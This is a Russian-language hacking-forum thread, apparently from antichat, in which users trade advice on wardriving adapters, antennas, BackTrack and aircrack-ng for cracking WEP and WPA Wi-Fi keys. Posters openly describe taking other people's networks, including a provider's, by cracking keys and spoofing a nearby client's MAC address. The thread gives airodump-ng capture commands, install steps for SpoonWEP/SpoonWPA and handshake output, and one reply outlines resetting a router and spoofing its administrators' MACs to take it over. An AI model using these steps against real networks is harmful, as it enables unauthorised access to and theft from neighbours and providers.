В общем вопрос такой есть ноут HP pavilion dv5-1240er, есть вайфай- "Адаптер Broadcom 802.11b/g WLAN" будет подходить он для вардрайвинга или нет т.к. на форумах пишут что подходит , но ставлю дрова "Broadcom340" (версия у них старая) вайвай не пашет....

В общем вопрос такой есть ноут HP pavilion dv5-1240er, есть вайфай- "Адаптер Broadcom 802.11b/g WLAN" будет подходить он для вардрайвинга или нет т.к. на форумах пишут что подходит , но ставлю дрова "Broadcom340" (версия у них старая) вайвай не пашет....
Попробую найти что нибудь по твоей теме, а пока посмотри здесь https://forum.antichat.ru/thread57249.html

Поискал, посмотрел, короче тебе лучше взять выносной или под слот ExpressCard (если он есть)какой нибудь адаптер поддерживающий вардрайвинг! Просто положительных реплик я не увидел про твой адаптер! Подбери в списке адаптеров,ссылка выше. Удачи.

Всем привет..
Подскажите новичку,
имеется карточка DWL-643, слабенький приём в режиме мониторинга...
Теорию по доработке внешней антены прочитал
http://www.lan23.ru/wifi/DWA643/DWA643mod.html

Вопрос: Кто нибудь делал это на практике и какой результат?
Какую антенку прицепить для Wardriving'а? Чем больше усиление, тем лучше? Или нет?

Всем привет..
Подскажите новичку,
имеется карточка DWL-643, слабенький приём в режиме мониторинга...
Теорию по доработке внешней антены прочитал
http://www.lan23.ru/wifi/DWA643/DWA643mod.html

Вопрос: Кто нибудь делал это на практике и какой результат?
Какую антенку прицепить для Wardriving'а? Чем больше усиление, тем лучше? Или нет?
Конечно, чем больше мощность антены тем лучше!!!
Я сначало сделал себе баначную антену от 8-12 дицебел http://www.radiosait.ru/page_129.html , та точка которая мне была нужна(она находится в 800 метрах от меня) была внедосягаемости моей антены,потом я сделал антену Фа20 18-22 децибела http://www.lan23.ru/wifi/fa20.html и УРА точка впоймалась да ещё с каким сигналом, в целых 68%!!! Так, что если есть возможность делай помошней антену! ФА20 отличная антена, многие её хвалят в том числе и я, но есть одно но ,чем мошней антена тем вреднее для здоровья! Да, и провод должен быть не длинный, максимум 3 метра, а то будут большие потери по кабелю!!! Кстати сначало я подключал антену к переделанному USB адаптеру D-Link DWA -110, но потом купил себе D-Link DWA-520 PC. Удачи.

Конечно, чем больше мощность антены тем лучше!!!
Я сначало сделал себе баначную антену от 8-12 дицебел http://www.radiosait.ru/page_129.html , та точка которая мне была нужна(она находится в 800 метрах от меня) была внедосягаемости моей антены,потом я сделал антену Фа20 18-22 децибела http://www.lan23.ru/wifi/fa20.html и УРА точка впоймалась да ещё с каким сигналом, в целых 68%!!! Так, что если есть возможность делай помошней антену! ФА20 отличная антена, многие её хвалят в том числе и я, но есть одно но ,чем мошней антена тем вреднее для здоровья! Да, и провод должен быть не длинный, максимум 3 метра, а то будут большие потери по кабелю!!! Кстати сначало я подключал антену к переделанному USB адаптеру D-Link DWA -110, но потом купил себе D-Link DWA-520 PC. Удачи.

Почему идёте путём прб .Я выкидывал ссылки на WI-FI карты . и в режим мониторинга входит без проблем.Я его заказывал через инет на данный момент эта карта класс, усиленный USB adapter , вот пару ссылок .

http://wireless.mobil.com.ua/product_info.php?products_id=1600&language=RU

http://www.w-lan.kiev.ua/index.php?productID=167

http://www.chinavasion.com/product_info.php/pName/80211g-high-power-wireless-usb-adapter-rtl8187-chipset/

удачи всем участникам античата с уважением Semby68

Почему идёте путём прб .Я выкидывал ссылки на WI-FI карты . и в режим мониторинга входит без проблем.Я его заказывал через инет на данный момент эта карта класс, усиленный USB adapter , вот пару ссылок .

http://wireless.mobil.com.ua/product_info.php?products_id=1600&language=RU

http://www.w-lan.kiev.ua/index.php?productID=167

http://www.chinavasion.com/product_info.php/pName/80211g-high-power-wireless-usb-adapter-rtl8187-chipset/

удачи всем участникам античата с уважением Semby68

Добрый день всем!Кто может подсказать как можно узнать IP адрес по которому соединяются клиенты с удалённой точкой доступа?Может это умеет CommView for WiFi(при сборе пакетов ничего не выходит), только я не знаю как настроить её чтоб она показала IPишники или можно как то через Back Track3 ?Помогите пожалуйста. А то уже кучу программ накачал но так не одна прога не показала Ip адрес!

Доброго времени суток!
Вопрос такой, есть ежик асус 901, бектрек на нем запускаю с usb, но на неё ничего не сохраняется, как вылечить? Или это в принципе неизлечимо в live версиях? А то пакеты не сохраняются после перезагрузки, очень напрягает.

Доброго времени суток!
Вопрос такой, есть ежик асус 901, бектрек на нем запускаю с usb, но на неё ничего не сохраняется, как вылечить? Или это в принципе неизлечимо в live версиях? А то пакеты не сохраняются после перезагрузки, очень напрягает.
Да,они сами не как не сохраняются почемуто.я вот что делал,находил этот файл в который записываются пакеты( у меня он наз., xxx-01.cap и ещё xxx-01.txt у тебя по другому,как сам назовёшь) и просто брал,и переносил либо на ещё одну флешку либо кидал на жёсткий диск.а другой способ я пока не знаю!

вариант, хоть и не без гемора :( Блин а на ноут ставить нехочется, винда нужна, нэх, лан сеня купим адаптер продолжим тестить и втыкать, а то встроенная в асус инъекции не делает, к стати еще у меня упорно после airodump-ng ra0 не отображается параметр pwr стоит всегда 0(вобще всегда), что это значит?

Ура! Нарыл в Москве ORIENT XG-701A+ вопрос такой,какова номинальная мощность с антеной? и можно ли увеличить ее и есть ли какая-то информация по соотношению мощьность и дальность? ну конкретно, а то и так понятно что чем мощьнее тем дальше бьет =)

podskazhite kto znaet kak lomat wifi na laptope stoit atheros ar9285 wifi adapter. esli mozhno otvet na milo alex2belarus@aol.com ili gde naiti drova na CommView

podskazhite kto znaet kak lomat wifi na laptope stoit atheros ar9285 wifi adapter. esli mozhno otvet na milo alex2belarus@aol.com ili gde naiti drova na CommView
По поводу взлома не знаю поможет или нет здесь посмотри http://forum.xakep.ru/m_877032/tm.htm и здесь https://forum.antichat.net/showthread.php?p=468077 . А по поводу CommView for WiFi, у этой проги встроенные дрова,если Ваш адаптер поддерживает Wardriving то при установки этой проги она и установит свои дрова!

eto proga soderzhit poket dariverov dlia wifi adapterom no moego tam net v etom to i problema mozhet kto znaet gde naiti?

eto proga soderzhit poket dariverov dlia wifi adapterom no moego tam net v etom to i problema mozhet kto znaet gde naiti?
посмотри здесь http://www.aircrack-ng.org/doku.php?id=compatibility_drivers может поможет!

Люди плиз. нужны ссылки на словари для брута для WPA. токо чтобы слова были в них от 8 символов.

Люди плиз. нужны ссылки на словари для брута для WPA. токо чтобы слова были в них от 8 символов.
Здесь не смотрел http://forum.antichat.ru/thread13640.html , если не смотрел посмотри.А я пока поищу ещё где нибудь!позже отпишусь!

Вопрос такой: Как увидеть диапозон ip? Kismet ниче не показывает, шифрование wep, ключ получен. Ось BT3.

Вопрос такой: Как увидеть диапозон ip? Kismet ниче не показывает, шифрование wep, ключ получен. Ось BT3.

Должно и этого хватить. Подключайся к сети, авось по дхцп адресок отхватишь :)

Должно и этого хватить. Подключайся к сети, авось по дхцп адресок отхватишь :)
чего этого?) Вопрос как =) Над узнать ip-шники точки и тех кто к ней подключен. хм... Netdiscover адекватно работает? А то сегодня могу не попасть к нужной сетке чтобы проверить

Вопрос такой: Как увидеть диапозон ip? Kismet ниче не показывает, шифрование wep, ключ получен. Ось BT3.
airodump'om мониторь нужный канал, далее запускаешь wireshark на интерфейсе монитора и в опциях добавляешь wep ключ сети, далее ставишь фильтр на tcp и смотришь что за адреса используются.

чего этого?) Вопрос как =) Над узнать ip-шники точки и тех кто к ней подключен. хм... Netdiscover адекватно работает? А то сегодня могу не попасть к нужной сетке чтобы проверить

Ну вааабще..... честно говоря... так сказать)) У тебя чё не получается к сетке подключиться? Елси да, то напиши как ты ето делаеш. Авось смогу помочь. :cool:
А как подключишсяс IP получишь и глянеш какие там айпишнечги.
Сколько раз запускал Kismet, ни разу он сцуко мне адреса не показал. :D

Ребята,у меня такая ситуация: есть точка wep шифрование скрытая,ключик я подобрал с помощью ВТ3,сначала в никакую не мог подключится потом прписал мак адрес клиента и айпишник 192.168.1.2,маска 255.255.255.0 и подключился но только почемуто нет инета,кто может подсказать в чём может быть проблема? и как узнать есть ли вообще на точке инет?может айпишник не правильный!

Ребята,у меня такая ситуация: есть точка wep шифрование скрытая,ключик я подобрал с помощью ВТ3,сначала в никакую не мог подключится потом прписал мак адрес клиента и айпишник 192.168.1.2,маска 255.255.255.0 и подключился но только почемуто нет инета,кто может подсказать в чём может быть проблема? и как узнать есть ли вообще на точке инет?может айпишник не правильный!
Поснифай пакеты и увидишь используется инет или нет.

Ребята,у меня такая ситуация: есть точка wep шифрование скрытая,ключик я подобрал с помощью ВТ3,сначала в никакую не мог подключится потом прписал мак адрес клиента и айпишник 192.168.1.2,маска 255.255.255.0 и подключился но только почемуто нет инета,кто может подсказать в чём может быть проблема? и как узнать есть ли вообще на точке инет?может айпишник не правильный!

Напиши пожалуйста какой айпишник ты получил, а потом пингани гугл или мэйл.ру . Вот. А инета может не быть из-за того, что эти товарищи на интернеты через прокси ходят. Если так, то нуно узнавать настройки для проксика. Вот. :)

Напиши пожалуйста какой айпишник ты получил, а потом пингани гугл или мэйл.ру . Вот. А инета может не быть из-за того, что эти товарищи на интернеты через прокси ходят. Если так, то нуно узнавать настройки для проксика. Вот. :)
Никакой айпишник я не получал!Я методом тыка подбирал!а к точке подключался когда рядом не было клиента,которого я взял мак и прописал в адаптере! рядом с точкой ещё штук 6 клиентов,я подключаюсь под чужим,вот и когда я подключился от меня начинают уходить пакеты, а обратно ничего!
значит получается нужно как то ещё чтото узнать чтоб инетом пользоваться!?и как узнать?

Во первых к точке моно подцепитиься и с левым ИП. Второе нужно знать гейтвей.. куда пакетам бежать...и в третих могут работать через проксю..Вот тебе инфа копай тут. Думаю четвертого не дано ))))

Никакой айпишник я не получал!Я методом тыка подбирал!а к точке подключался когда рядом не было клиента,которого я взял мак и прописал в адаптере! рядом с точкой ещё штук 6 клиентов,я подключаюсь под чужим,вот и когда я подключился от меня начинают уходить пакеты, а обратно ничего!
значит получается нужно как то ещё чтото узнать чтоб инетом пользоваться!?и как узнать?

Чё ты разошелся? Кричиш понимаешь тут. :) Методом перебора правильный IP ты подбирать долго будешь. Скажу лишь что коммерческие организации частенько используют IP вида 10.1.ххх.ххх ; 10.1.6.ххх. Вот. А в инет, я повторюсь, не попадеж пока не узнаешь как клиенты в этой сетке туды попадают. Потому на данный момент твоя задача попасть в сеть! А дальше пиши на форум. Вместе разбираться будем)

наснифай пакетов, расшифруй с помощб airdecap-ng и посмотри wiresharkom что кчему. там уидиш есть ли инет ваше, и адресс шлюза и диапозон Ip узнаеш

у меня есть backtrack2 3его нет возможно ли ломать сети через 2ой?

наснифай пакетов, расшифруй с помощб airdecap-ng и посмотри wiresharkom что кчему. там уидиш есть ли инет ваше, и адресс шлюза и диапозон Ip узнаеш
добрый вечер, а можно это с помощью CommViewFor WiFi сделать?или какие команды прописать в консоли ВТ3,если не трудно поподробнее пожалуйста!?или может сцылка есть на эти команды в ВТ3?

у меня есть backtrack2 3его нет возможно ли ломать сети через 2ой?
Можно и с этой версией! впринципе можно и обновления скачать или нет возможности!?вот ссылка http://www.remote-exploit.org/backtrack_download.html. И ещё в ВТ3 последняя версия aircrack-ng, с возможностью обновления.

Ребят, а есть Wi-Fi для вардрайвинга и + есть разьём под симки (3G-инет) ..... нашел только один сони эрикстон, но хотят за него 8к , может может есть что нить по более приемлемой цене?
за ранее спасибо!

Народ помогите, поставил backtrack 2 запускаю aircrack ,но он не видит мою карту(
(карта intel 3945ABG карта поддерживаемая)

добрый вечер, а можно это с помощью CommViewFor WiFi сделать?или какие команды прописать в консоли ВТ3,если не трудно поподробнее пожалуйста!?или может сцылка есть на эти команды в ВТ3?

Перехват пакетов данных в беспроводных сетях с использованием BackTrack3 (2,4). Краткое руководство по airodump-ng.
Открываешь окно терминала (один клик на иконке терминала в левом нижнем углу рабочего стола BackTrack. Внимание!!!! расположение иконки запуска терминала может отличаться в зависимости от настроек рабочего стола). В терминале набираем команду:
iwconfig - смотрим название нашего WiFi адаптера (пример wifi0, wlan0, wifi1 и т.п.);
Следующая команда:
airmon-ng [device] start - где [device] твой WiFi даптер, данная команда настраивает твое железо в режим перехвата пакетов данных;
Следующая команда:
airodump-ng [device] - где [device] твой WiFi адаптер, узнать его название можно командой iwconfig в консоли (пример wifi0, wlan0 и т.п.).
Итак, эту команду мы выполнили для того чтобы увидеть доступные беспроводные сети. Выбираешь ESSID сети, которую хочешь ломать, смотришь канал на котором она работает. Дальше открываешь второе окно терминала и там набираешь:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device] - где [channel] это канал, на котором работает сеть, которую ты ломаешь;
[network.out] - это файл, в котором будут сохраняться перехваченные пакеты;
[bssid] - mac-адрес беспроводной сети, которую мы вскрываем;
[device] твой WiFi адаптер.
Пример команды:
airodump-ng -c 5 -w dump –bssid 00-1E-8C-84-C6-99 wlan0
Всё. :)

Народ помогите, поставил backtrack 2 запускаю aircrack ,но он не видит мою карту(
(карта intel 3945ABG карта поддерживаемая)

Хаааоо, белый человек!
Вопрос: зачем ты запускаешь aircrack, пакеты уже собрал? Карта верно распозналась системой? iwconfig набирал? Напиши пожалуйста как ты запускаешь aircrack. ;)
Если да, то проблем не должно быть. Можешь попробовать перед aircrack'om набрать команду:
airmon-ng [device] stop - где [device] - твой wifi адаптер.

Ребят, а есть Wi-Fi для вардрайвинга и + есть разьём под симки (3G-инет) ..... нашел только один сони эрикстон, но хотят за него 8к , может может есть что нить по более приемлемой цене?
за ранее спасибо!

Чёт я не понял.. :)
Что значит Wifi для вардрайвинга?
Я вообще думаю, что Wifi придумали именно для вардрайвинга :p
Ну а если серьёзно и если ты имел ввиду wifi адаптер для вардрайвинга, то да есть, рекомендуются карточки на основе Atheros (Ну это если ты пользуешся BackTrack - операционкой заточенной под взлом всяких там разных компьютеризированных систем). Вот. А про разъем под симку я вааабще не понял :) Поэтому тут ничего сказать не могу.

[B][I] Zdrasti,mne mojno pomosh... v Moskve gde mojno kupic Edimax EW-7318USg wi-fi adaptr,pishite v.xachatryan@mail.ru
sposibo

Народ много статей уже перечитал, может где просто проглядел, у мя ноут HP, с интегрированным ви-фи, карта Broadcom 802.11 b/g WLAN чет я по многим ссылкам погулял но так и не нашел драйверов под нее для корректной работы aircrack'a, если кто знает линк ссылочку плиз, если конечно же с моей картой реально использовать айркряк
Заранее спс

Народ много статей уже перечитал, может где просто проглядел, у мя ноут HP, с интегрированным ви-фи, карта Broadcom 802.11 b/g WLAN чет я по многим ссылкам погулял но так и не нашел драйверов под нее для корректной работы aircrack'a, если кто знает линк ссылочку плиз, если конечно же с моей картой реально использовать айркряк
Заранее спс

У меня тоже HP с Broadcom. Под XP драйверов нету, чтобы эта карта работала с aircrack. Но есть Linux/BackTrack 4 Pre Final. Где эта карта работает на ура. Сам не одну сеть поимел. Раньше в карте этого раздела были ссылки на статьи по взлому в BackTarck, но щас я чёто не вижу. Так вот слей BackTrack 4 по этой ссылке, запиши, запусти. http://www.remote-exploit.org/backtrack_download.html

запускай прогу в консоле airodump-ng и читай описние https://forum.antichat.ru/thread50472.html

Карта раздела. https://forum.antichat.ru/thread50472.html

Есть вопросы пиши. желательно по конкретней

Кто знает как подобрать пароль к WiFi если сеть с включёной безопасностью?

Хи народ, пока лазил по ссылкам форума, кончился инет (((((
Воспользовавшись Network Stumbler и авто - поехал гулять по городу. С мыслью в голове авось повезет (случается такое)

Уселся в машину включил ноут и тут же поймал сеть....
Сигнал был отвратительно слабый, по этому не обращая на него внимание нажал на педаль.

В итоге прокатавшись около двух часов в безуспешных поимках халявы (оч надо было) поехал домой. Мое место на парковке было занято (((( пришлось искать новое, заехал с другой стороны дома и вот она та сетка, причем с хорошим качеством сигнала. Обсалютно не защищеная...

Вот теперь пришлось из своей комнаты переехать на кухню(сигнал четче). А седня утром погуляв с ноутом на разных лавочках пришел к заключению что сигнал идет из АТС!!! Там же и провайдер мой размещен.

Тут решил узнать все на верняка, полез на сайтик глянуть свой новый IP и его расположение - ИПИ принадлежит моему же провайдеру!!!

Эт я к тому, что в нашем мире, где раюотают люди всегда будут дыры во всех системах безобастности Imho: человеческий фактор никто не отменял.

Вот терь думаю а имеет ли смысл мне проплачивать свой инет )))))

Щас расскажу мысль, потом задам конкретный вопрос.
У меня дома у самого локальная сеть и для домашних масштабов - довольно не маленькая 12 компрьютеров. Ну зарабатываю я как провайдер (раздаю инет на небольших скоростях). щас моя сетка работает по принцыпу:

Точкадоступа(провайдера) => Ноут => маршрутник => сеть

Таким образом мой ноут привязан к кухне, и его функциональность, как ноута, как то плавно рассеевается))))

А хотелось бы:
Точкадоступа(провайдера) => Моя точка доступа => Сеть

Если это реально подскажите как, или линканите ссылочки почитать по настройкам маршрутников (WI-FI => WI-FI)

Тоесть еще более конкретный вопрос реально ли на моем ASUS WL-530gV2 настроить прием инета не через WAN а через WI-FI

Зарание спасибо!!!

З.Ы. ЕЕсли написал не втот топик очень извеняюсь!!!

Explоit пасибо попробую

Почитав ваши статейки понял что для подбора лучше всего использовать BT-3 или тому подобное! но если нету дров на картточку можно про все забыть! и это все относится к wep. А вот про Wpa как я понял надо только по словарям и все??? видимо больше другие метоы не идут? Вот у нас люди не любят wep шифрование, а любят wpa, и почему они такие!!! теперь вопрос: так все жесть есть ли смылс читать читать и читать про wep - побдор паролей если хочется ломануть wpa, wpa2(-psk). и если возможет такой подбор пароля то каким методом, неужели только атакой по словарю??

Добрый день Господа. У меня вот какая ситуация. Купил ноут. С его помощью "добыл" ключ от точки вайфай. Дальше... в "доступных сетях" жму на точку которую ломанул.. просит ключ... вписываю туда ключ. Ок! подключен! но не тут то было... исходящие запросы идут (когда набираю адрес в браузере), а входящего нет. круглый ноль. подскажите что я не так делаю. ведь я подключился к точке и кажется должно все заработать.


и еще... теперь хочу этот ключ использовать при подключении к взломанной точке с роутером (кажется она так называется) которая на крыше размещена. может ли кто нибудь помочь с настройками?

Linux-007
а у тебя случаем подключение не ограничино! могет там не DHCP раздает а в ручную надо поискать адреса!? и не забудь попингова сайтики!

Добрый день Господа. У меня вот какая ситуация. Купил ноут. С его помощью "добыл" ключ от точки вайфай. Дальше... в "доступных сетях" жму на точку которую ломанул.. просит ключ... вписываю туда ключ. Ок! подключен! но не тут то было... исходящие запросы идут (когда набираю адрес в браузере), а входящего нет. круглый ноль. подскажите что я не так делаю. ведь я подключился к точке и кажется должно все заработать.


и еще... теперь хочу этот ключ использовать при подключении к взломанной точке с роутером (кажется она так называется) которая на крыше размещена. может ли кто нибудь помочь с настройками?

Ну смотри, что касаеться твоего вопроса по поводу инета,- тут все просто он не проплачен :D я ся тож ламал, на ура приконектился, а дальше все как ты выше описывал. Это один из вариантов, второй:- ты приконектился не к точке доступа а к какой либо рабочей станции (тут сложно судить т.к. мало информации)

А что касаемо точки доступа на крыше, скорее всего ты имеешь в виду роутер, тут всепросто, вводишь его ипи в браузере и делаешь все что душе угодно, однако, доступ на роут скорее всего прописан на фиксированный ip, в этом случае шансов маловасто, или прописан за определенным МАКадрессом, в этом случае лезишь на крышу нажимаешь кнопку ресет на роуте и сканишь всех кто к нему коннектиться (админы сети полюбому полезут настраивать роут), после чего просто методом глобального тыка подставляешь вместо себя подключающиеся МАКи, если сеть не большая то впринцепи это займет не много времени. Но и тут есть подводные камни - логин и пас, но об этом в другом разделе....

Ну смотри, что касаеться твоего вопроса по поводу инета,- тут все просто он не проплачен :D я ся тож ламал, на ура приконектился, а дальше все как ты выше описывал. Это один из вариантов, второй:- ты приконектился не к точке доступа а к какой либо рабочей станции (тут сложно судить т.к. мало информации)

А что касаемо точки доступа на крыше, скорее всего ты имеешь в виду роутер, тут всепросто, вводишь его ипи в браузере и делаешь все что душе угодно, однако, доступ на роут скорее всего прописан на фиксированный ip, в этом случае шансов маловасто, или прописан за определенным МАКадрессом, в этом случае лезишь на крышу нажимаешь кнопку ресет на роуте и сканишь всех кто к нему коннектиться (админы сети полюбому полезут настраивать роут), после чего просто методом глобального тыка подставляешь вместо себя подключающиеся МАКи, если сеть не большая то впринцепи это займет не много времени. Но и тут есть подводные камни - логин и пас, но об этом в другом разделе....


Благодарю за поддержку брат. Та точка на крыше это мой роутер. Я его туда ставил. Ломал точку (провайдера) через ноут, так как с роутером не умею ломать вайфай :) Вот достал ключ 33:3:36:35:34:32 (все цифры выдуманные... в реале получил другие). еще аиркряк выдал рядом с ключом и это - ASCII - 32154. (что бы это могло быть?) Я бы хотел подключится к прову через роутер так как с ноутом надо ближе к окну держатся а точка на длинном шнурке. и сигнал отличный.

:) .... можно писать поподробнее как для младенца? спасибо за помощь братва......

стукни в асю

Привет всем ! Eсть такой вопрос .... ? Кто нибудь взломал шифрование WPA-WPA-2 . Читал много статей ,на взлом WPA , пробовал сам ломать с прогой " SWPA.lzm " и по словарям, и что-то не выходит , всё пишет что не нашолся key в этом словаре , может кто видел в инете какие нибудь статьи по поводу хороших словарей на взлом WPA шифрования , отпишите . Зарание благодарю , с уважением Semby68 . С WEP нет проблем на взлом , а вот WPA это по серьёзней , хотя и это я думаю ломается !!!

Всем привет.У меня такой вопрос,у меня дома ловятся 2 сетки интернета и обе защищены WPA-PSK.Много читал здесь по теме взлома этого дела,качаю ВТ-4 сейчас.Хотелось бы узнать можно ли это взломать вообще и какие действия ведутся в этом направлении.Может ткнёте меня в нужную ветку или другой ресурс где это подробно описывается.Большое спасибо

Всем привет.У меня такой вопрос,у меня дома ловятся 2 сетки интернета и обе защищены WPA-PSK.Много читал здесь по теме взлома этого дела,качаю ВТ-4 сейчас.Хотелось бы узнать можно ли это взломать вообще и какие действия ведутся в этом направлении.Может ткнёте меня в нужную ветку или другой ресурс где это подробно описывается.Большое спасибо
на сколько я знаю, тебе поможет только перебор по словарю!

Всем привет. Вопрос насчёт пробела в названии сетки и ВТ3. Проблема в том, что сетка имеет в имени SSID пробел. Естественно, aireplay-ng, когда я хочу авторизоваться в эту сеть, такой SSID не понимает, и просит указать верные параметры. Как тут можно выкрутиться, может в строке aireplay-ng этот SSID какими-нибудь тэгами обозначить, чтобы пробел воспринимался как составная часть SSID, а не как переход к другой команде строки? Спасибо.

Либо заключай название в двойные кавычки, либо экранируй пробел бэкслэшэм (\)

Для взлома Wi-Fi точки доступа с методом шифрования WPA, сколько надо примерно перехватить пакетов?

Для взлома Wi-Fi точки доступа с методом шифрования WPA, сколько надо примерно перехватить пакетов?


Всего один пакет, и его то и надо брутить, выглядит это так.

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230




root@bt:/# ls /tmp/wpa2* -al

-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap

-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv

-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

это дружеское рукапожатие и разрешение подключения к точке, вот так-то очень просто, только не просто узнать пароль , будет ли он в твоих словарях ?

Zdrasti, rebyata Orient XG-701a+ etot adaptrom mojno vzlomac wi-fi???,esli da skajite imya pragrami...

Подскажите программы для захвата пакетов с поддержкой адаптера Broadcom 802,11g
(желательно ссылку) Буду очень благодарен

Либо заключай название в двойные кавычки, либо экранируй пробел бэкслэшэм (\)
Спасибо, реально работает!

Подскажите программы для захвата пакетов с поддержкой адаптера Broadcom 802,11g
(желательно ссылку) Буду очень благодарен


Пробу # BackTrack 3 final # вот ссылкак на скачку !!! http://torrents.ru/forum/viewtopic.php?t=1380189

видел один ролик со SpoonWPA, но в ВТ3 он не установлен... его нужно устанавливать отдельно??? и где его можно скачать???

видел один ролик со SpoonWPA, но в ВТ3 он не установлен... его нужно устанавливать отдельно??? и где его можно скачать???


Сначала необходимо скачать файлы - по сцылкам

spoonwep2 - http://neovortex.kodings.googlepages.com/spoonwep2.lzm

spoonwpa - http://shamanvirtuel.googlepages.com/SWPA.lzm

далее - запустить БТ3

После входа в систему - запустить терминал

например, я скопировал файлы на флэшку, она у меня примонтирована как sda1. Соответственно, "мои команды"-

bt# /usr/bin/lzm2dir /mnt/sda1/spoonwep2.lzm /

bt# /usr/bin/lzm2dir /mnt/sda1/SWPA.lzm /

после чего можно залезать в меню
K/backtrack/Radio Network Analysis/80211/All
или
K/backtrack/Radio Network Analysis/80211/Crack
и запускать
SpoonWEP2
или
SpoonWPA
смотря что нужно. Для любителей - запуск из терминала:

bt# /usr/bin/spoonwep

bt# /usr/bin/spoonwpa

видел один ролик со SpoonWPA, но в ВТ3 он не установлен... его нужно устанавливать отдельно??? и где его можно скачать???


А вот ссылка на видео, попробуй может и будет толк

http://blip.tv/file/1108519/

видел один ролик со SpoonWPA, но в ВТ3 он не установлен... его нужно устанавливать отдельно??? и где его можно скачать???


Вот ещё чё пишут умельцы, у меня правда не чего не вышло не в первом ни во втором случаи это я пишу про WPA ,а WEP проблем нет, все сети ломанул что в округе меня

http://www.lokk.ru/page.php?id=8

semby, СПАСИБО!!! лови "+" ;)
насчет wep-а у меня проблем не было, но вот с WPA приходится бороться, так как не всегда получается то, что хочу...
еще вопрос к окружаещему миру :) В airowizard-е как получить "рукопожатие"???

и ещё, есть ли 100% метод получения "рукопожатия" в ВТ3 и остальных прогах???
на сколько я понял, то нет...

и ещё, есть ли 100% метод получения "рукопожатия" в ВТ3 и остальных прогах???
на сколько я понял, то нет...

Заглени сюда ,может что-то и понадобится !!!

http://guruadmin.ru/page/vzlamyvaem-wpa2-psk-ispolzuja-backtrack-4-aircrack-ng-i-john-the-ripper

удачи всем участникам чата !!!

Раз на то пошло, то расскажи еще о путях ...
имею ввиду /usr/bin/lzm2dim... (почему так и что за что отвечает) (желательно подробней)
кинь еще познавательную ссылку на подобное :)
СПБ!

Раз на то пошло, то расскажи еще о путях ...
имею ввиду /usr/bin/lzm2dim... (почему так и что за что отвечает) (желательно подробней)
кинь еще познавательную ссылку на подобное :)
СПБ!


/usr/bin/lzm2dir

Это дирекция, куда будет установлена программа !

А это название проги или фаила ,и откуда её взять и установить

/mnt/sda1/SWPA.lzm /


sda1 это USB

sdа1

буква :a : ,может менятся ,d,b,c -это как определит ситемма USB устройство

Я сам сейчас погрузился в изучение Backtrack 4 final . Много интересного в нём , не могу с него войти в инет , не знаю как запустить WI-FI , да и его надо распаковывать а точне запускать дополнительные приложения , если интерестно то держи ссылку:

http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf


http://opsec.cotse.net/opsec/?p=1046

спб за описание, но ...
короче, флеху у меня определяет как sdb1, но когда ввожу выше указаный путь, то он мне пишет, что ненаходит директорию...
поэтому хотелось узнать более подробнее (я работаю в 3-м ВТ)...
и ещё - ... откуда её взять и установить
/mnt/sda1/SWPA.lzm /
mnt - что это? почему просто не /флешка/файл/ ??? я поэкспериминтировал, но ничего не получилось???

спб за описание, но ...
короче, флеху у меня определяет как sdb1, но когда ввожу выше указаный путь, то он мне пишет, что ненаходит директорию...
поэтому хотелось узнать более подробнее (я работаю в 3-м ВТ)...
и ещё - ... откуда её взять и установить
/mnt/sda1/SWPA.lzm /
mnt - что это? почему просто не /флешка/файл/ ??? я поэкспериминтировал, но ничего не получилось???

Тебе надо установить SpoonWPA? Можешь не париться с установкой через BT.
Зайди на флеху под виндой, в Папке BT3 если память мне не изменяет есть папка modules, туда кидаешь файл swpa.lzm и при следующем включении BT3 у тебя все установлено.))) То же самое со SpoonWEP 2.

Это ерунда вроде на ВТ-4 можно вскрыть WPA-WPA2-PSK , надо узнать какими командами его можно полностью распаковать для взлома , там и aircrack по круче будет! Может кто подкинет ссылку ? Заранее благодарю , с уважением Semby!!!

Это ерунда вроде на ВТ-4 можно вскрыть WPA-WPA2-PSK , надо узнать какими командами его можно полностью распаковать для взлома , там и aircrack по круче будет! Может кто подкинет ссылку ? Заранее благодарю , с уважением Semby!!!
"Вскрыть" WPA/WPA2 PSK на сегодняшний день можно только перебором по словарю.
Для этого нужен aircrack-ng. Он есть в репах даже убунты. Ставить для этого BT совсем не обязательно.

Это ерунда вроде на ВТ-4 можно вскрыть WPA-WPA2-PSK , надо узнать какими командами его можно полностью распаковать для взлома , там и aircrack по круче будет! Может кто подкинет ссылку ? Заранее благодарю , с уважением Semby!!!
Убей себя =\
Ты заепал применять стили на свой текст, плюс читай мануалы, которых полно. Потом будешь знать, как "вскрыть" все что угодно. Такие дела.

Сегодня наткнулся на WEP точке с Share Auth, пытаюсь фейково соединиться - хрен, все время деавторизация. Щито с ней делать? Один раз пустило, пакетов немного нагнал и все заглохло. Но дело не в этом - ключ я знаю, но точка скрытая, и имеет вышеуказанную аутентификацию, а нужно подсоединится к ней с винды. Ссид я тоже знаю, но если руками вбиваю ключ и веп-опен, просто вечный коннект.

Народ такой вопрос, как совместить Network Stumbler и КПК с ГПС? как не пробовал - чет не как ни пробовал - не катит, кто ГПС и Network Stumbler юзал дайте подсказку плиз. На гугл не посылайте, был - туфта....

Вот така ситуация:
Небольшое вступление:
У меня на ноуте 2 системы - одна рабочая, другая тестово-аварийная.
Сегодня решил обновится до 9.04, а делаю я это так:
Ставлю на тестово-аврийный диск систему, проверяю работу ВайФай так как с этим часто проблемы - в этот раз он заводится с полпинка.
Я ставлю систему рабочую и первое же, что делаю это:
ifconfig wlan0 down
iwconfig wlan0 mode Ad-hoc

Но получаю:

Error for wireless request "Set Mode" (8B06) :
* *SET failed on device wlan0; Operation not supported.

Первая мысль - стало что-то не так. ну ничего - копирую с аварийки */etc (fstab конечно сохраняю родной), системы-то идентичны...
И получаю:

iwconfig wlan0 mode Ad-hoc
Error for wireless request "Set Mode" (8B06) :
* *SET failed on device wlan0; Operation not supported.

